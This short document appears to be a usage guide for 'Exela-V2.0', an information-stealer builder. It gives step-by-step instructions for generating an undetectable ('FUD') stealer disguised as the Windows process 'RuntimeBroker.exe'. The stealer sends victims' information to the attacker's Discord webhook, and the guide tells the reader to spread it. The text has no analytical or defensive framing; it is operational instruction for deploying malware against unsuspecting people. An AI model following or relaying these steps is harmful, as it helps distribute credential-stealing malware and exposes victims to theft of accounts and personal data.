How to Build Stealer:
- Download the python 3.11 or 3.10 from https://www.python.org/
- Open the Exela-V2.0 folder and Click the Builder.exe file
- When it is finished downloading all python files needed it will ask for your Discord Webhook. Paste it and hit ENTER
- When finished a new file called "RuntimeBroker.exe" will be in folder. This is your FUD stealer. Spread it and when someone opens it all information will be sent to your Discord Channel!
